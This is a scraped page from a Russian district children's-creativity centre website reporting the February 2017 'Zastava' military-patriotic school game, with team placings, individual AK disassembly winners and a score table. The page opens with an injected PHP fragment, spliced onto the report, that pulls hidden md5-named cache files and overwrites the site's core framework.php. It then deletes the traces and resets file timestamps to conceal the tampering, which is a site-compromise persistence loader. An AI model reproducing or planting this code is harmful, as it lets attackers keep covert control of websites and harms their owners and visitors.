$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } "Застава"
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы оставлять комментарии в гостевой книге



Спасибо за регистрацию

Ссылки

План мероприятий

Декабрь 2017
Пн Вт Ср Чт Пт Сб Вс
27 28 29 30 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Developed by JoomVision.com
Баннер
  • Toggle
  • Закрыть

"Застава" PDF Печать E-mail

   Согласно плана РОО и ДДТ 17февраля 2017 года прошла районная игровая акция «Застава», В которой приняли участие 16 команд Новосергиевского района, 112 обучающихся. Средние общеобразовательные школы: Кувайская, Барабановская, Хуторская, Мустаевская, Кулагинская, Нестеровская, Сузановская, Старобелогорская, Герасимовская, Новосергиевская №1, Новосергиевская №2, Новосергиевская №3, Платовская им. А. Матросова, основные общеобразовательные школы: Землянская, Козловская.

Цели и задачи:

     1. Совершенствование традиционных и поиск инновационных форм и методов работы по патриотическому воспитанию учащихся и подготовке их к военной службе.

     2. Проверка уровня знаний, навыков и умений по разделам юнармейской подготовки,

     3. Популяризация военно-прикладных видов спорта, привлечение к занятию ими широких масс учащихся.

 

На основании протоколов жюри и положения акцииутверждены  списки победителей:

   1 общекомендное место – команде «Комета» МОБУ «Мустаевская СОШ»

   2 общекомендное место – команде «Патриоты» МОБУ «Землянская ООШ»

   3 общекомендное место – команде «Монолит» МОБУ «Кувайская СОШ»

 

2. По конкурсам игровой акции:

конкурс «Боевой листок»: 1 место – команда «Юный пограничник» МОБУ «Новосергиевская СОШ №2»

                                               2 место - команде «Патриоты» МОБУ «Землянская ООШ»

                                               3 место - команде «Убойная сила» МОАУ «Кулагинская СОШ»

Конкурс «Военный биатлон»: 1 место - команде «Комета» МОБУ «Мустаевская СОШ»

                                     2 место - команде «Солдаты» МОБУ «Старобелогорская СОШ»

3 место - команде «Монолит» МОБУ «Кувайская СОШ»

конкурс «Силовой комплекс»: 1 место – команда «Феникс» МОБУ «Платовская СОШ им.А.Матросова»

                                               2 место - команде «Комета» МОБУ «Мустаевская СОШ»

                                               3 место - команде «Патриот» МОБУ «Сузановская СОШ»

конкурс «Дни воинской славы»: 1 место – команда «Комета» МОБУ «Мустаевская СОШ»

                                               2 место - команде «Альфа» МОБУ «Барабановская СОШ»

                                              3 место - команде «Патриот» МОБУ «Сузановская СОШ»

конкурс «Эстафета АК»: 1 место – команда «8 рота» МОБУ «Нестеровская СОШ»

                                               2 место - команде «Юный пограничник» МОБУ «Новосергиевская СОШ №2»

                                              3 место - команде «Россияне» МОБУ «Новосергиевская СОШ №1»

конкурс «Исторический»: 1 место – команда «Россияне» МОБУ «Новосергиевская СОШ №1»

                                               2 место - команде «Монолит» МОБУ «Кувайская СОШ»

                                               3 место - команде «Убойная сила» МОАУ «Кулагинская СОШ»

 

3. В личном первенстве: конкурс «Неполная разборка и сборка АК »:

среди юношей:

     1 место - Пивоваров Виталий- уч-ся 8 б класса МОБУ «НовосергиевскаяСОШ №3 »

     2 место – Дедловский Владислав –уч-ся 8а класса МОБУ «Новосергиевская СОШ №2»,

   3 место – Пешков Данил- уч-ся МОБУ «Нестеровская СОШ»

Среди девушек:

   1 место - Белоклокова Анастасия уч-ся МОБУ «Герасимовская СОШ»

   2 место –Пешкова Татьяна- уч-ся МОБУ «Нестеровская СОШ»

3 место – Бутыркина Надежда- уч-ся МОБУ «Новосергиевская СОШ №3»

 


Итоги 1 этапа игровой акции «ЗАСТАВА»


№ п/п

Школа, команда

Итоги конкурсов 1 этапа

Боевой листок

Военный биатлон

Силовой комплекс

Дни воинской славы

Эстафета АК

Исторический

Итого баллов

Место

1

Козловская ООШ «Звезда»

15

6

11

4

16

14

66

12

2

Землянская ООШ «Патриот»

2

8

4

10

8

2

34

2

3

Старобелогорская СОШ   «Солдаты»

16

2

12

7

12

7

56

10

4

Хуторская СОШ «Русичи»

6

4

9

11

10

9

49

8

5

Новосергиевская СОШ №2 «Юный пограничник»

1

14

4

7

2

16

44

6

6

Барабановская СОШ «Альфа»

12

13

10

2

14

13

64

11

7

Платовская СОШ «Феникс»

5

7

1

5

13

12

43

5

8

Мустаевская СОШ «Комета»

4

1

2

1

4

5

17

1

9

Новосергиевская СОШ № 3 «Наследники победы»

9

9

5

8

5

6

42

5

10

Новосергиевская СОШ №1 «Россия»

13

15

7

6

3

1

45

7

11

Сузановская СОШ «Патриот»

11

5

3

3

6

11

39

4

12

Нестеровская СОШ «8 рота»

10

10

13

9

1

10

53

9

13

Герасимовская СОШ

«Герасимовка.ru»

8

11

6

13

15

15

68

13

14

Кулагинская СОШ «Убойная сила»

3

12

14

5

7

3

44

6

15

Новосергиевская СОШ №2 «Самый юный пограничник»

14

16

15

12

9

8

74

14

16

Кувайская СОШ «Монолит»

7

3

8

7

11

2

38

3

 

 

image 1

 

image

 

image 2

 

image 3

 

image 5

 

image 6

 

image 4

 

 

comback_black_green_75

 

 


Обновлено 17.02.2017 18:05